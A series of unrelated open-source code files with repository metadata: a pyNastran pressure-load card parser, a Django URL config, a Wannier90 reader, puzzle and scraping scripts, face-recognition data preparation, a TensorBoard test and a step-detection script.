+========+=====+=====+====+====+======+======+======+=======+\n | PLOAD4 | SID | EID | P1 | P2 | P3 | P4 | G1 | G3/G4 |\n +--------+-----+-----+----+----+------+------+------+-------+\n | | CID | N1 | N2 | N3 | SORL | LDIR | | |\n +--------+-----+-----+----+----+------+------+------+-------+\n\n Shell Format\n ============\n Defines a pressure load on a face of a CTRIA3, CTRIA6, CTRIAR,\n CQUAD4, CQUAD8, or CQUADR element.\n\n +--------+-----+-----+----+----+------+------+------+-------+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |\n +========+=====+=====+====+====+======+======+======+=======+\n | PLOAD4 | SID | EID | P1 | P2 | P3 | P4 | THRU | EID2 |\n +--------+-----+-----+----+----+------+------+------+-------+\n | | CID | N1 | N2 | N3 | SORL | LDIR | | |\n +--------+-----+-----+----+----+------+------+------+-------+\n\n .. 
warning:: NX does not support SORL and LDIR, MSC does\n \"\"\"\n type = 'PLOAD4'\n\n def __init__(self, sid, eids, pressures, g1, g34,\n cid=0, nvector=None, surf_or_line='SURF',\n line_load_dir='NORM', comment=''):\n \"\"\"\n Creates a PLOAD4 card\n\n Parameters\n ----------\n sid : int\n the load id\n eids : List[int, ...]\n shells : the range of element ids; must be sequential\n solids : must be length 1\n pressures : List[float, float, float, float]\n tri : must be length 4 (the last value should be the same as the 0th value)\n quad : must be length 4\n g1 : int/None\n only used for solid elements\n g34 : int / None\n only used for solid elements\n cid : int; default=0\n the coordinate system for ???\n nvector : (3, ) float ndarray\n blank : load acts normal to the face\n the local pressure vector\n surf_or_line : str; default='SURF'\n SURF : surface load\n LINE : line load (only defined for QUADR, TRIAR)\n not supported\n line_load_dir : str; default='NORM'\n direction of the line load (see surf_or_line); {X, Y, Z, TANG, NORM}\n not supported\n comment : str; default=''\n a comment for the card\n\n TODO: fix the way \"pressures\" works\n \"\"\"\n if nvector is None:\n nvector = np.zeros(3, dtype='float64')\n else:\n nvector = np.asarray(nvector, dtype='float64')\n\n if comment:\n self.comment = comment\n if isinstance(eids, integer_types):\n eids = [eids]\n if isinstance(eids, float_types):\n pressures = [pressures] * 4\n # TODO: handle default pressure as input\n\n self.sid = sid\n\n # these can be greater than 1 if it's a shell (not a solid)\n self.eids = eids\n self.pressures = np.asarray(pressures)\n\n #: used for solid element only\n self.g1 = g1\n #: g3/g4 - different depending on CHEXA/CPENTA or CTETRA\n self.g34 = g34\n\n #: Coordinate system identification number. See Remark 2.\n #: (Integer >= 0;Default=0)\n self.cid = cid\n self.nvector = nvector\n\n # flag with values of SURF/LINE\n self.surf_or_line = surf_or_line\n\n # Line load direction\n #\n # 1. X, Y, Z : line load in x/y/z in the element coordinate\n # system\n # 2. TANG : line load is tangent to the edge pointing\n # from G1 to G2\n # 3. 
NORM : line load is in the mean plane, normal to the\n # edge and pointing outwards from the element\n #\n # if cid=N123 = 0: line_load_dir_default=NORM\n self.line_load_dir = line_load_dir\n #self.eid_ref = None\n self.g1_ref = None\n self.g34_ref = None\n self.cid_ref = None\n self.eids_ref = None\n\n def validate(self):\n if self.surf_or_line not in ['SURF', 'LINE']:\n raise RuntimeError('PLOAD4; sid=%s surf_or_line=%r' % (self.sid, self.surf_or_line))\n if self.line_load_dir not in ['LINE', 'X', 'Y', 'Z', 'TANG', 'NORM']:\n raise RuntimeError(self.line_load_dir)\n assert self.g1 != 0, str(self)\n assert self.g34 != 0, str(self)\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a PLOAD4 card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n eid = integer(card, 2, 'eid')\n p1 = double_or_blank(card, 3, 'p1', 0.0)\n pressures = [\n p1,\n double_or_blank(card, 4, 'p2', p1),\n double_or_blank(card, 5, 'p3', p1),\n double_or_blank(card, 6, 'p4', p1)]\n\n eids = [eid]\n g1_thru = integer_string_or_blank(card, 7, 'g1/THRU')\n if g1_thru == 'THRU' and integer_or_blank(card, 8, 'eid2'):\n # alternate form\n eid2 = integer(card, 8, 'eid2')\n if eid2:\n eids = list(unique(\n expand_thru([eid, 'THRU', eid2], set_fields=False, sort_fields=False)\n ))\n g1 = None\n g34 = None\n else:\n # standard form\n eids = [eid]\n g1 = integer_or_blank(card, 7, 'g1')\n g34 = integer_or_blank(card, 8, 'g34')\n\n cid = integer_or_blank(card, 9, 'cid', 0)\n nvector = array([double_or_blank(card, 10, 'N1', 0.0),\n double_or_blank(card, 11, 'N2', 0.0),\n double_or_blank(card, 12, 'N3', 0.0)])\n surf_or_line = string_or_blank(card, 13, 'sorl', 'SURF')\n line_load_dir = string_or_blank(card, 14, 'ldir', 'NORM')\n assert len(card) <= 15, 'len(PLOAD4 card) = %i\\ncard=%s' % (len(card), card)\n return PLOAD4(sid, eids, pressures, g1, g34, cid, nvector,\n surf_or_line, line_load_dir, comment=comment)\n\n @classmethod\n def add_op2_data(cls, data, comment=''):\n \"\"\"\n Adds a PLOAD4 card from the OP2\n\n Parameters\n ----------\n data : List[varies]\n a list of fields defined in OP2 format\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = data[0]\n eid = data[1]\n pressures = data[2]\n\n g1 = data[3]\n g34 = data[4]\n if g1 == 0:\n g1 = None\n if g34 == 0:\n g34 = None\n cid = data[5]\n nvector = data[6]\n\n surf_or_line = data[7]\n\n eids = [eid]\n if data[7] is None:\n surf_or_line = 'SURF'\n assert data[8] is None, data\n line_load_dir = 'NORM'\n else:\n surf_or_line = data[7]\n line_load_dir = data[8]\n pload4 = PLOAD4(sid, eids, pressures, g1, g34, cid, nvector,\n surf_or_line, line_load_dir, comment=comment)\n assert sid < 10000000, pload4\n assert cid < 10000000, pload4\n return pload4\n\n def get_loads(self):\n return [self]\n\n def transform_load(self):\n \"\"\"\n Considers single elememnts\n\n .. warning:: surf_or_line=SURF is supported (not LINE)\n .. warning:: line_load_dir=NORM is supported (not X,Y,Z)\n \"\"\"\n if self.surf_or_line != 'SURF':\n msg = ('Only surface loads are supported. '\n 'required_surf_or_line=SURF. actual=%r' % self.surf_or_line)\n raise RuntimeError(msg)\n if self.line_load_dir != 'NORM':\n msg = ('Only normal loads are supported. '\n 'required_line_load_dir=NORM. actual=%r' % self.line_load_dir)\n raise RuntimeError(msg)\n if len(self.eids) != 1:\n msg = 'Only one load may be defined on each PLOAD4. 
nLoads=%s\\n%s' % (\n                len(self.eids), str(self))\n            raise RuntimeError(msg)\n\n        elem = self.eids_ref[0]\n        if self.g1 and self.g34: # solid elements\n            nid = self.g1_ref.nid\n            nid_opposite = self.g34_ref.nid\n            (face_node_ids, area) = elem.get_face_nodes_and_area(self, nid, nid_opposite)\n        else:\n            face_node_ids = elem.node_ids\n            area = elem.Area()\n        n = len(face_node_ids)\n\n        if self.surf_or_line == 'SURF':\n            if norm(self.nvector) != 0.0 or self.cid != 0:\n                vector = self.nvector / np.linalg.norm(self.nvector)\n                assert self.Cid() == 0, 'cid=%r on a PLOAD4 is not supported\\n%s' % (self.Cid(), str(self))\n            else:\n                # normal pressure\n                assert len(self.eids_ref) == 1, 'only 1 element is supported by transform_load on PLOAD4\\n%s' % (str(self))\n                elem = self.eids_ref[0]\n                vector = array(elem.Normal())\n        else:\n            raise NotImplementedError('surf_or_line=%r on PLOAD4 is not supported\\n%s' % (\n                self.surf_or_line, str(self)))\n\n        vectors = []\n        for (nid, p) in zip(face_node_ids, self.pressures):\n            vectors.append(vector * p * area / n) # Force_i\n        is_load = None\n        return (is_load, face_node_ids, vectors)\n\n    def Cid(self):\n        \"\"\"gets the coordinate system object\"\"\"\n        if self.cid_ref is not None:\n            return self.cid_ref.cid\n        return self.cid\n\n    def cross_reference(self, model):\n        \"\"\"\n        Cross links the card so referenced cards can be extracted directly\n\n        Parameters\n        ----------\n        model : BDF()\n            the BDF object\n        \"\"\"\n        msg = ', which is required by PLOAD4 sid=%s' % self.sid\n        self.cid_ref = model.Coord(self.cid, msg=msg)\n        if self.g1 is not None:\n            self.g1_ref = model.Node(self.g1, msg=msg + '; g1')\n        if self.g34 is not None:\n            self.g34_ref = model.Node(self.g34, msg=msg + '; g34')\n        if self.eids:\n            self.eids_ref = model.Elements(self.eids, msg=msg)\n\n    def safe_cross_reference(self, model, xref_errors, debug=True):\n        msg = ', which is required by PLOAD4 sid=%s' % self.sid\n        #self.eid = model.Element(self.eid, msg=msg)\n        self.cid_ref = model.safe_coord(self.cid, self.sid, xref_errors, msg=msg)\n\n        #self.eid_ref = self.eid\n        if self.g1 is not None:\n            try:\n                self.g1_ref = model.Node(self.g1, msg=msg)\n            except KeyError:\n                model.log.warning('Could not find g1=%s%s' % (self.g1, msg))\n\n        if self.g34 is not None:\n            try:\n                self.g34_ref = model.Node(self.g34, msg=msg)\n            except KeyError:\n                model.log.warning('Could not find g34=%s%s' % (self.g34, msg))\n\n        #if self.eids:\n        msgia = 'Could not find element=%%s%s\\n' % msg\n        self.eids_ref, msgi = model.safe_get_elements(self.eids, msg=msgia)\n        if msgi:\n            model.log.warning(msgi.rstrip())\n\n    def uncross_reference(self):\n        self.cid = self.Cid()\n        if self.g1 is not None:\n            self.g1 = self.G1()\n        if self.g34 is not None:\n            self.g34 = self.G34()\n        self.eids = self.element_ids\n        self.g1_ref = None\n        self.g34_ref = None\n        self.cid_ref = None\n        self.eids_ref = None\n\n    def G1(self):\n        if self.g1_ref is not None:\n            return self.g1_ref.nid\n        return self.g1\n\n    def G34(self):\n        if self.g34_ref is not None:\n            return self.g34_ref.nid\n        return self.g34\n\n    @property\n    def node_ids(self):\n        node_ids = [self.G1(), self.G34()]\n        return node_ids\n\n    def get_element_ids(self, eid=None):\n        if self.eids_ref is not None:\n            try:\n                eids = [eid_ref.eid for eid_ref in self.eids_ref]\n            except AttributeError:\n                eids = []\n                for eid_ref in self.eids_ref:\n                    if isinstance(eid_ref, integer_types):\n                        # Nastran is NOT OK with elements that don't actually exist in the PLOAD4\n                        # we do this for safe_cross_reference\n                        eids.append(eid)\n                    else:\n                        eids.append(eid_ref.eid)\n        else:\n            eids = self.eids\n        
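# after safe_cross_reference, eids_ref can hold a mix of element objects and\n        # plain integer ids (elements that could not be found); both branches above\n        # collapse that mix back into a flat list of integer ids\n        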
return eids\n\n @property\n def element_ids(self):\n return self.get_element_ids()\n\n def repr_fields(self):\n eids = self.element_ids\n eid = eids[0]\n p1 = self.pressures[0]\n p2 = set_blank_if_default(self.pressures[1], p1)\n p3 = set_blank_if_default(self.pressures[2], p1)\n p4 = set_blank_if_default(self.pressures[3], p1)\n list_fields = ['PLOAD4', self.sid, eid, self.pressures[0], p2, p3, p4]\n\n if self.g1 is not None:\n # is it a SOLID element\n node_ids = self.node_ids\n #node_ids = self.node_ids([self.g1, self.g34])\n list_fields += node_ids\n else:\n if len(eids) > 1:\n try:\n list_fields.append('THRU')\n eidi = eids[-1]\n except:\n print(\"g1 = %s\" % self.g1)\n print(\"g34 = %s\" % self.g34)\n print(\"self.eids = %s\" % self.eids)\n raise\n list_fields.append(eidi)\n else:\n list_fields += [None, None]\n\n cid = self.Cid()\n if cid or norm(self.nvector) > 0.0:\n n1 = self.nvector[0]\n n2 = self.nvector[1]\n n3 = self.nvector[2]\n list_fields.append(cid)\n list_fields += [n1, n2, n3]\n surf_or_line = self.surf_or_line\n line_load_dir = self.line_load_dir\n else:\n list_fields += [None, None, None, None]\n surf_or_line = set_blank_if_default(self.surf_or_line, 'SURF')\n line_load_dir = set_blank_if_default(self.line_load_dir, 'NORM')\n list_fields.append(surf_or_line)\n if surf_or_line == 'LINE':\n list_fields.append(line_load_dir)\n return list_fields\n\n def raw_fields(self):\n eids = self.element_ids\n eid = eids[0]\n p1 = self.pressures[0]\n p2 = self.pressures[1]\n p3 = self.pressures[2]\n p4 = self.pressures[3]\n list_fields = ['PLOAD4', self.sid, eid, p1, p2, p3, p4]\n\n if self.g1 is not None:\n # is it a SOLID element\n node_ids = self.node_ids\n #node_ids = self.node_ids([self.g1, self.g34])\n list_fields += node_ids\n else:\n if len(eids) > 1:\n try:\n list_fields.append('THRU')\n eidi = eids[-1]\n except:\n print(\"g1 = %s\" % self.g1)\n print(\"g34 = %s\" % self.g34)\n print(\"self.eids = %s\" % self.eids)\n raise\n list_fields.append(eidi)\n else:\n list_fields += [None, None]\n\n cid = self.Cid()\n if cid or norm(self.nvector) > 0.0:\n n1 = self.nvector[0]\n n2 = self.nvector[1]\n n3 = self.nvector[2]\n list_fields.append(cid)\n list_fields += [n1, n2, n3]\n else:\n list_fields += [None, None, None, None]\n\n surf_or_line = self.surf_or_line\n line_load_dir = self.line_load_dir\n list_fields.append(surf_or_line)\n if surf_or_line == 'LINE':\n list_fields.append(line_load_dir)\n return list_fields\n\n def write_card(self, size=8, is_double=False):\n # type: (int, bool) -> str\n \"\"\"\n The writer method used by BDF.write_card()\n\n Parameters\n -----------\n size : int; default=8\n the size of the card (8/16)\n \"\"\"\n card = self.repr_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n return self.comment + print_card_16(card)\n\n\nclass PLOADX1(BaseCard):\n \"\"\"\n Pressure Load on Axisymmetric Element\n\n Defines surface traction to be used with the CQUADX, CTRIAX, and CTRIAX6\n axisymmetric element.\n\n +---------+-----+-----+----+----+----+----+-------+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |\n +=========+=====+=====+====+====+====+====+=======+\n | PLOADX1 | SID | EID | PA | PB | GA | GB | THETA |\n +---------+-----+-----+----+----+----+----+-------+\n \"\"\"\n type = 'PLOADX1'\n\n def __init__(self, sid, eid, pa, nids, pb=None, theta=0., comment=''):\n \"\"\"\n Creates a PLOADX1 card, which defines surface traction for\n axisymmetric elements.\n\n Parameters\n ----------\n sid : int\n load id\n eid : int\n element id (CQUADX, CTRIAX, or 
CTRIAX6)\n nids : List[int, int]\n Corner grid points.\n GA and GB are any two adjacent corner grid points of the element\n pa / pb : float / None\n Surface traction at grid point GA or GB\n pb : default is None -> pa\n theta : float; default=0.0\n Angle between surface traction and inward normal to the line\n segment.\n comment : str; default=''\n a comment for the card\n \"\"\"\n BaseCard.__init__(self)\n if comment:\n self.comment = comment\n if pb is None:\n pb = pa\n self.sid = sid\n self.eid = eid\n self.pa = pa\n self.pb = pb\n self.ga = nids[0]\n self.gb = nids[1]\n self.theta = theta\n self.eid_ref = None\n self.ga_ref = None\n self.gb_ref = None\n\n def validate(self):\n assert isinstance(self.ga, integer_types), 'ga=%r' % self.ga\n assert isinstance(self.gb, integer_types), 'gb=%r' % self.gb\n assert isinstance(self.pa, float), 'pa=%r' % self.pa\n assert isinstance(self.pb, float), 'pb=%r' % self.pb\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a PLOADX1 card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n eid = integer(card, 2, 'eid')\n pa = double(card, 3, 'pa')\n pb = double_or_blank(card, 4, 'pb', pa)\n ga = integer(card, 5, 'ga')\n gb = integer(card, 6, 'gb')\n theta = double_or_blank(card, 7, 'theta', 0.)\n assert len(card) <= 8, 'len(PLOADX1 card) = %i\\ncard=%s' % (len(card), card)\n nids = [ga, gb]\n return PLOADX1(sid, eid, pa, nids, pb=pb, theta=theta, comment=comment)\n\n @classmethod\n def add_op2_data(cls, data, comment=''):\n \"\"\"\n Adds a PLOADX1 card from the OP2\n\n Parameters\n ----------\n data : List[varies]\n a list of fields defined in OP2 format\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid, eid, pa, pb, ga, gb, theta = data\n nids = [ga, gb]\n return PLOADX1(sid, eid, pa, nids, pb=pb, theta=theta, comment=comment)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by PLOADX1 lid=%s' % self.sid\n self.eid_ref = model.Element(self.eid, msg=msg)\n self.ga_ref = model.Node(self.ga, msg=msg)\n self.gb_ref = model.Node(self.gb, msg=msg)\n\n @property\n def node_ids(self):\n return [self.Ga(), self.Gb()]\n\n @property\n def nodes(self):\n return [self.ga, self.gb]\n\n @property\n def nodes_ref(self):\n return [self.ga_ref, self.gb_ref]\n\n def safe_cross_reference(self, model, safe_coord):\n return self.cross_reference(model)\n\n def uncross_reference(self):\n self.eid = self.Eid()\n self.ga = self.Ga()\n self.gb = self.Gb()\n self.eid_ref = None\n self.ga_ref = None\n self.gb_ref = None\n\n def Eid(self):\n if self.eid_ref is not None:\n return self.eid_ref.eid\n return self.eid\n\n def Ga(self):\n if self.ga_ref is not None:\n return self.ga_ref.nid\n return self.ga\n\n def Gb(self):\n if self.gb_ref is not None:\n return self.gb_ref.nid\n return self.gb\n\n def get_loads(self):\n return [self]\n\n def raw_fields(self):\n list_fields = [\n 'PLOADX1', self.sid, self.Eid(), self.pa, self.pb,\n self.Ga(), self.Gb(), self.theta]\n return list_fields\n\n def repr_fields(self):\n return self.raw_fields()\n\n def write_card(self, size=8, is_double=False):\n # type: (int, bool) -> str\n \"\"\"\n The writer method used by BDF.write_card()\n\n Parameters\n -----------\n size : int; default=8\n the size of the card 
(8/16)\n \"\"\"\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n if is_double:\n return self.comment + print_card_double(card)\n return self.comment + print_card_16(card)\n\n\ndef normalize(self, msg=''):\n \"\"\"\n adjust the vector to a unit length\n scale up the magnitude of the vector\n \"\"\"\n assert abs(self.mag) > 0, 'mag=%s\\n%s' % (self.mag, self)\n if abs(self.mag) != 0.0: # enforced displacement\n norm_xyz = norm(self.xyz)\n if norm_xyz == 0.0:\n raise RuntimeError('xyz=%s norm_xyz=%s' % (self.xyz, norm_xyz))\n #mag = self.mag * norm_xyz\n self.mag *= norm_xyz\n try:\n self.xyz = self.xyz / norm_xyz\n except FloatingPointError:\n msgi = 'xyz = %s\\n' % self.xyz\n msgi += 'norm_xyz = %s\\n' % norm_xyz\n msgi += 'card =\\n%s' % str(self)\n msgi += msg\n raise FloatingPointError(msgi)\n\n\n#def normalize(self):\n #\"\"\"\n #adjust the vector to a unit length\n #scale up the magnitude of the vector\n #\"\"\"\n #if self.mag != 0.0: # enforced displacement\n #norm_xyz = norm(self.xyz)\n ##mag = self.mag*norm_xyz\n #self.mag *= norm_xyz\n #self.xyz /= norm_xyz\n","repo_name":"mtnakayama/pyNastran","sub_path":"pyNastran/bdf/cards/loads/static_loads.py","file_name":"static_loads.py","file_ext":"py","file_size_in_byte":99370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"38381384135","text":"from django.urls import path\nfrom Doctor.views import *\n\n\nurlpatterns = [\n path('',dummy,name='dummy'),\n path('doctor_view/',doctor_view,name='doctor_view'),\n path('show_appointment',show_appointment,name='show_appointment'),\n \n path('confirm_booking/',confirm_booking,name='confirm_booking')\n]","repo_name":"Abshar12/Hosptal_Management_System","sub_path":"Doctor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25808213846","text":"import numpy as np\n\nclass Wannier90:\n def __init__(self, parms):\n f = open(parms['Wannier90_hr'])\n f.readline()\n self.Nwann = int(f.readline())\n self.nrpts = int(f.readline())\n\n num_lines = self.nrpts/15\n if self.nrpts%15 != 0:\n num_lines += 1\n ndgen = []\n for iline in xrange(num_lines):\n ndgen.extend(f.readline().split())\n ndgen = np.array(ndgen, dtype=int)\n\n self.HamR = np.zeros((self.nrpts, self.Nwann, self.Nwann), dtype=complex)\n self.irvec = np.zeros((self.nrpts, 3), dtype=int)\n for ir in xrange(self.nrpts):\n for i in xrange(self.Nwann):\n for j in xrange(self.Nwann):\n i1,i2,i3,i4,i5,r1,r2 = f.readline().split()\n self.HamR[ir, int(i4)-1,int(i5)-1] = (float(r1) + 1J * float(r2))/(1.*ndgen[ir]) \n self.irvec[ir,0] = i1\n self.irvec[ir,1] = i2\n self.irvec[ir,2] = i3\n\n self.HamR = self.HamR.reshape((self.nrpts, 2, self.Nwann/2, 2, self.Nwann/2)).transpose((0,2,1,4,3)).reshape((self.nrpts, self.Nwann, self.Nwann))\n \n def get_Hk(self, kvec):\n Hk = np.zeros((self.Nwann,self.Nwann,),dtype=complex)\n for iR in range(self.nrpts):\n Hk += self.HamR[iR,:,:]*np.exp(2J*np.pi*(self.irvec[iR,0]*kvec[0]+self.irvec[iR,1]*kvec[1]+self.irvec[iR,2]*kvec[2]))\n return Hk\n","repo_name":"ALPSCore/pyDMFT","sub_path":"wannier90.py","file_name":"wannier90.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"43930886414","text":"\"\"\"Advent of Code 2022-12-02\"\"\"\r\n\r\nabc = ('A', 'B', 'C')\r\nxyz = ('X', 'Y', 'Z')\r\npts = (1, 2, 
3)\r\nrel = (1, 2, 0)\r\n\r\nwith open(\"aoc02-1.txt\", \"r\", encoding = \"utf-8\") as file:\r\n lines = [l.strip() for l in file.readlines()]\r\n\r\nrounds_alpha = [l.split() for l in lines]\r\n\r\nrounds = [(abc.index(a), xyz.index(x)) for a, x in rounds_alpha]\r\nprint(f\"{rounds!r}\")\r\n\r\nscore = 0\r\n\r\nfor r in rounds:\r\n a, x = r\r\n p = pts[x]\r\n w = rel[x - a]\r\n s = p + w * 3\r\n print(f\"{a} {x} -> {s}\\n\")\r\n score += s\r\n\r\nprint(f\"{score}\\n\")\r\n","repo_name":"f382/AdventOfCode","sub_path":"2022/aoc02_0.py","file_name":"aoc02_0.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32514095895","text":"# scrap a movie website and get the 'trendings' list\nimport requests\nfrom bs4 import BeautifulSoup as BS\nURL = \"https://goku.sx/home\"\n\nresponse = requests.get(URL)\ncontents = BS(response.text, 'html.parser')\ncontainer = contents.find('div', class_='tab-pane show active')\nitems = container.find_all('div', class_='item')\n\nfor item in items:\n name = item.find('h3', class_='movie-name')\n names = name.text\n with open('movie_list.txt', 'a', encoding=None) as f:\n f.writelines(f'{names}\\n')\n","repo_name":"Awwal12/python_class","sub_path":"In-Class_Assessment/12th_july/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42468395286","text":"import os\nfrom PIL import Image\nimport numpy as np\nimport pickle\nimport cv2\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nimage_dir = os.path.join(BASE_DIR, \"faces_gray_crop\")\n\ncurrent_id = 0\nlabel_ids = {}\ny_labels = []\nx_train = []\nsize = (100, 100)\n\nfor root, dirs, files in os.walk(image_dir):\n for file in files:\n if file.endswith(\"png\") or file.endswith(\"jpg\"):\n path = os.path.join(root, file)\n label = os.path.basename(root).replace(\" \", \"-\").lower()\n if label in label_ids:\n pass\n else:\n label_ids[label] = current_id\n current_id += 1\n id_ = label_ids[label]\n # print(label_ids)\n\n image = cv2.imread(path, cv2.IMREAD_GRAYSCALE)\n image = cv2.resize(image, size)\n image_array = np.array(image, \"uint8\")\n\n x_train.append(image_array)\n y_labels.append(id_)\n\ndata = (x_train, y_labels)\nprint(np.array(x_train).shape)\nwith open(\"data.pickle\", \"wb\") as f:\n pickle.dump(data, f)\n\nprint(label_ids)\n\nwith open(\"labels.pickle\", 'wb') as f:\n pickle.dump(label_ids, f)\n","repo_name":"phamthientan272/Face_Recognition","sub_path":"prepare_training_data.py","file_name":"prepare_training_data.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21652212207","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\n\nimport tensorflow as tf\nimport tensorboard as tb\n\n\nSTANDARD_PLUGINS = frozenset([\n 'audio',\n 'custom_scalar',\n 'histogram',\n 'image',\n 'pr_curve',\n 'scalar',\n 'text',\n])\n\n\nclass SummaryExportsTest(tf.test.TestCase):\n\n def test_each_plugin_has_an_export(self):\n for plugin in STANDARD_PLUGINS:\n self.assertIsInstance(getattr(tb.summary, plugin), collections.Callable)\n\n def test_plugins_export_pb_functions(self):\n for plugin in STANDARD_PLUGINS:\n self.assertIsInstance(\n getattr(tb.summary, '%s_pb' % plugin), 
collections.Callable)\n\n def test_all_exports_correspond_to_plugins(self):\n exports = [name for name in dir(tb.summary) if not name.startswith('_')]\n futures = frozenset(('absolute_import', 'division', 'print_function'))\n bad_exports = [\n name for name in exports\n if name not in futures and not any(\n name == plugin or name.startswith('%s_' % plugin)\n for plugin in STANDARD_PLUGINS)\n ]\n if bad_exports:\n self.fail(\n 'The following exports do not correspond to known standard '\n 'plugins: %r. Please mark these as private by prepending an '\n 'underscore to their names, or, if they correspond to a new '\n 'plugin that you are certain should be part of the public API '\n 'forever, add that plugin to the STANDARD_PLUGINS set in this '\n 'module.' % bad_exports)\n\n\nif __name__ == '__main__':\n tf.test.main()\n","repo_name":"dunkelhaus/cancerTherapy","sub_path":"modules/HTTPRequest/projector/mnist-tensorboard-embeddings/tensorboard/tensorboard/summary_test.py","file_name":"summary_test.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"72693558880","text":"import re\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nsdkData = []\n\n\ndef getdata():\n if len(sdkData) == 0:\n with open('./testcase/sdkInfo') as fileData:\n info = []\n data = fileData.read().splitlines()\n for line in data:\n linedata = line.strip().split()\n if re.match(r'\\d{13}.*', linedata[0]) and linedata[1] != 'TYPE_WIFI':\n info.append(linedata)\n for i in range(0, len(info), 4):\n b = info[i: i+4]\n datadict = {}\n for item in b:\n datadict['time'] = item[0]\n datadict[item[1]] = item[2: 5]\n sdkData.append(datadict)\n return sdkData\n\n\ndef callistsumbyindex(start, end, array):\n sum = 0\n index = start\n while start <= index <= end:\n sum += array[index]\n index += 1\n return sum\n\n\ndef smoothacc(accs, width=19):\n length = len(accs) - 1\n halfW = width / 2\n targets = []\n for index, item in enumerate(accs):\n acc = 0\n if index < halfW:\n end = index * 2 + 1\n acc = callistsumbyindex(0, end, accs) / (end + 1)\n elif index < length - halfW:\n acc = callistsumbyindex(index - halfW, index + halfW, accs) / width\n elif index < length:\n acc = callistsumbyindex(index * 2 - length, length, accs) / (2 * (length - index) + 1)\n else:\n acc = item\n targets.append(acc)\n return targets\n\n\ndef findpace(list, times):\n minpeak = 10.5\n minvalley = 8.8\n timewindow = 0.2\n lastpeak = {\n 'time': 0,\n 'acc': 0,\n }\n lastvalley = {\n 'time': 0,\n 'acc': 0,\n }\n pace = []\n for index, item in enumerate(list):\n time = int(times[index])\n left = 0\n right = 0\n if 0 < index < len(list) - 1:\n left = list[index - 1]\n right = list[index + 1]\n if item > minpeak \\\n and time - lastpeak['time'] > timewindow\\\n and left < item < right:\n pace.append(item)\n lastpeak['time'] = time\n lastpeak['acc'] = item\n elif item < minvalley \\\n and time - lastvalley['time'] > timewindow\\\n and left > item > right:\n pace.append(item)\n lastvalley['time'] = time\n lastvalley['acc'] = item\n stepLens = []\n i = 0\n a = 0.8\n b = 0.2\n while i < len(pace) - 1:\n peak = max(pace[i], pace[i + 1])\n vallley = min(pace[i], pace[i + 1])\n pv = peak - vallley\n step = a * pow(pv, 1 / 4) + b * math.log(pv, math.e)\n stepLens.append(step)\n i += 2\n return stepLens\n\n\ndef handlegyros(gyroscopes, times):\n gyroeds = []\n time = 0\n for index, item in enumerate(gyroscopes):\n [wx, wy, wz] = item\n timecurrent = 
int(times[index])\n ww = pow((pow(float(wx), 2) + pow(float(wy), 2) + pow(float(wz), 2)), 0.5) * (timecurrent - time)\n time = timecurrent\n sinW = math.sin(ww / 2) / ww\n [q0, q1, q2, q3] = [math.cos(ww / 2), wx * sinW, wy * sinW, wz * sinW]\n RM = np.array([\n [1 - 2 * (q2 * q2 + q3 * q3), 2 * (q1 * q2 - q0 * q3), 2 * (q1 * q2 + q0 * q3)],\n [2 * (q1 * q2 + q0 * q3), 1 - 2 * (q1 * q1 + q3 * q3), 2 * (q2 * q3 - q0 * q1)],\n [2 * (q1 * q3 - q0 * q2), 2 * (q2 * q3 + q0 * q1), 1 - 2 * (q1 * q1 + q2 * q2)]])\n gyroeds.append(RM)\n return gyroeds\n\n\ndef main():\n datas = getdata()\n accList = []\n timelist = []\n gyroscopes = []\n for item in datas:\n accs = item.get('TYPE_ACCELEROMETER')\n acced = 0\n for acc in accs:\n acced += pow(float(acc), 2)\n acced = pow(acced, 0.5)\n timelist.append(item.get('time'))\n# gyroscopes.append(item.get('TYPE_GYROSCOPE'), item.get('time'))\n accList.append(acced)\n # find peak valley\n accssmoothed = smoothacc(accList)\n paces = findpace(accssmoothed, timelist)\n plt.plot(paces, label='pace')\n plt.legend()\n plt.show()\n\nmain()\n\n","repo_name":"bobwen13579/pdr-algo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71106004003","text":"\"\"\"\nThis file contains functions that are used as preprocessing steps of the features of the MIMIC dataset\nThey modify the pandas dataframe containing the data\nSee one of the notebook to have a working example\n\"\"\"\nimport pandas as pd\nimport numpy as np\nfrom sklearn.utils 